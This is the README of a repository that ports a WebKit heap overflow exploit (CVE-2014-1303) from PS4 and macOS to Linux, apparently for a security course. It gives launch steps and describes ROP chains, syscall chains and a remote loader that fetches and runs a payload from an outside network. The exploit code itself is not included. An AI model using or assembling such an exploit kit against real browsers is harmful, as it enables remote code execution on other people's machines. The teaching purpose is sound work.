CVE-2014-1303 PoC for Linux

CVE-2014-1303 (WebKit Heap based BOF) proof of concept for Linux.
This repository demonstrates the WebKit heap based buffer overflow vulnerability (CVE-2014-1303) on Linux.

NOTE: Original exploit is written for Mac OS X and PS4 (PlayStation4).

I've ported and tested work on Ubuntu 14.04, WebKitGTK 2.1.2

Usage

Firstly you need to run simple web server,

$ python server.py

then

$ cd /path/to/webkitgtk2.1.2/
$ ./Programs/GtkLauncher http://localhost

You can run several tests like,

• Crash ROP (Jump to invalid address like 0xdeadbeefdeadbeef)
• Get PID (Get current PID)
• Code Execution (Load and execute payload from outer network)
• File System Dump (Dump "/dev" entries)

Description

exploit.html ..... trigger vulnerability and jump to ROP chain
scripts/roputil.js ..... utilities for ROP building
scripts/syscall.js ..... syscall ROP chains
scripts/code.js ..... hard coded remote loader
loader/ ..... simple remote loader (written in C)
loader/bin2js ..... convert binary to js variables (for loader)

Purpose

I've created this WebKit PoC for education in my course.
I couldn't, of course, use actual PS4 console in my lecture for legal reason :(

Reference

CVE 2014-1303 Proof Of Concept for PS4
(https://github.com/Fire30/PS4-2014-1303-POC)
Liang Chen, WEBKIT EVERYWHERE: SECURE OR NOT? [BHEU14]
(https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF)